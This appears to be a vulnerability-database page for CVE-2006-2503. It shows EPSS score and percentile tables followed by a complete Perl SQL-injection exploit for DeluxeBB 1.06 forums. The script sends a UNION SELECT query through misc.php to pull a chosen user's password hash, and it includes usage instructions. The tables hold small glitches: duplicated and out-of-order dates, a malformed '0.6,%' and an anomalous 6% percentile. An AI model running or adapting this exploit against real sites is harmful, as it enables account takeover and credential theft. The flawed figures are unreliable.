CVE-2006-2503 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.14%	–	–
2022-03-13	–	–	1.14%	–	–
2022-04-03	–	–	1.14%	–	–
2022-06-26	–	–	1.14%	–	–
2022-09-25	–	–	1.14%	–	–
2023-02-26	–	–	1.14%	–	–
2023-03-12	–	–	–	1.4%	–
2023-03-26	–	–	–	1.22%	–
2023-06-11	–	–	–	1%	–
2023-07-09	–	–	–	1%	–
2023-07-23	–	–	–	0.93%	–
2024-02-11	–	–	–	0.93%	–
2024-02-18	–	–	–	0.93%	–
2024-06-02	–	–	–	0.93%	–
2024-11-17	–	–	–	0.93%	–
2024-12-22	–	–	–	0.97%	–
2025-02-16	–	–	–	0.97%	–
2025-01-19	–	–	–	0.97%	–
2025-02-16	–	–	–	0.97%	–
2025-03-18	–	–	–	–	0.6%
2025-03-30	–	–	–	–	0.6%
2025-04-15	–	–	–	–	0.6%
2025-04-15	–	–	–	–	0.6,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	35%
2022-03-13	36%
2022-04-03	57%
2022-06-26	58%
2022-09-25	59%
2023-02-26	6%
2023-03-12	84%
2023-03-26	83%
2023-06-11	81%
2023-07-09	82%
2023-07-23	81%
2024-02-11	82%
2024-02-18	83%
2024-06-02	83%
2024-11-17	84%
2024-12-22	83%
2025-02-16	84%
2025-01-19	83%
2025-02-16	84%
2025-03-18	68%
2025-03-30	67%
2025-04-15	68%
2025-04-15	68%

#!/usr/bin/perl use IO::Socket; print q{ ############################################# # DeluxeBB 1.06 Remote SQL Injection Exploit# # exploit discovered and coded # # by KingOfSka # # http://contropotere.netsons.org # ############################################# }; if (!$ARGV[2]) { print q{ Usage: perl dbbxpl.pl host /directory/ victim_userid perl dbbxpl.pl www.somesite.com /forum/ 1 }; } $server = $ARGV[0]; $dir = $ARGV[1]; $user = $ARGV[2]; $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; print "------------------------------------------------------------------------------------------------\r\n"; print "[>] SERVER: $server\r\n"; print "[>] DIR: $dir\r\n"; print "[>] USERID: $user\r\n"; print "------------------------------------------------------------------------------------------------\r\n\r\n"; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ; print "[~] PREPARE TO CONNECT...\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; print "[+] CONNECTED\r\n"; print "[~] SENDING QUERY...\r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "[+] DONE!\r\n\r\n"; print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; while ($answer = <$socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "Password Hash is: ".$1."\r\n"; print "--------------------------------------------------------------------------------------\r\n"; } exit(); } } print "------------------------------------------------------------------------------------------------\r\n"; # milw0rm.com [2006-05-15]